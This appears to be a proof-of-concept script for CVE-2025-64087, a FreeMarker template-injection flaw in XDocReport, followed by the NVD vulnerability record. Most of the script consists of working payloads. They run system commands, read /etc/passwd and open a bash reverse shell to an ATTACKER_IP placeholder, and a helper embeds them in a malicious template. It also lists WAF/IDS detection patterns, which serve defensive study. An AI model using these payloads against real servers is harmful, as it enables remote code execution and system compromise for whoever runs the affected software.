CVE-2025-64087

# CVE-2025-64087 PoC - XDocReport FreeMarker SSTI # Attack payload to execute arbitrary system commands # Payload 1: Basic command execution via FreeMarker Execute class payload_rce = '''${("freemarker.template.utility.Execute"?new())("whoami")}''' # Payload 2: Read /etc/passwd file payload_read = '''${(org.apache.commons.io.FileUtils?new().readFileToString("/etc/passwd"))}''' # Payload 3: Reverse shell connection payload_shell = '''${("freemarker.template.utility.Execute"?new())("bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1")}''' # Payload 4: Using object construction chain payload_chain = '''<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}''' # Exploit scenario in XDocReport context: def exploit_xdocreport(target_url, template_input): """ Simulate exploitation of XDocReport SSTI vulnerability """ malicious_template = f""" Document Title: ${{document_title}} Content: {payload_rce} """ # The template is processed by FreeMarker without sanitization # Result: Command execution on the server return malicious_template # Detection pattern for WAF/IDS: detection_patterns = [ r'\$\{.*freemarker.*\}', r'\$\{.*\.new\(\).*\}', r'\$\{.*utility\.Execute.*\}', r'<#assign.*new\(\)\s*>', r'\$\{.*\.data_model.*\}' ] print("[+] CVE-2025-64087 PoC Generated") print("[*] Target: opensagres XDocReport v1.0.0 - v2.1.0") print("[*] Vulnerability: FreeMarker SSTI -> RCE")

{"cve": {"id": "CVE-2025-64087", "sourceIdentifier": "[email protected]", "published": "2026-01-20T16:16:06.070", "lastModified": "2026-02-03T21:49:59.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Server-Side Template Injection (SSTI) vulnerability in the FreeMarker component of opensagres XDocReport v1.0.0 to v2.1.0 allows attackers to execute arbitrary code via injecting crafted template expressions."}, {"lang": "es", "value": "Una vulnerabilidad de Inyección de Plantillas del Lado del Servidor (SSTI) en el componente FreeMarker de opensagres XDocReport v1.0.0 a v2.1.0 permite a los atacantes ejecutar código arbitrario mediante la inyección de expresiones de plantilla manipuladas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensagres:xdocreport:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndIncluding": "2.1.0", "matchCriteriaId": "8D83BE34-198C-4EA3-AFFC-BD47A6949BF4"}]}]}], "references": [{"url": "https://github.com/AT190510-Cuong/CVE-2025-64087-SSTI-", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/opensagres/xdocreport", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/opensagres/xdocreport/pull/705", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://hackmd.io/@cuongnh/BJEnw7SAlg", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://hackmd.io/@cuongnh/SkQvhEf0lx", "source": "[email protected]", "tags": ["Permissions Required"]}]}}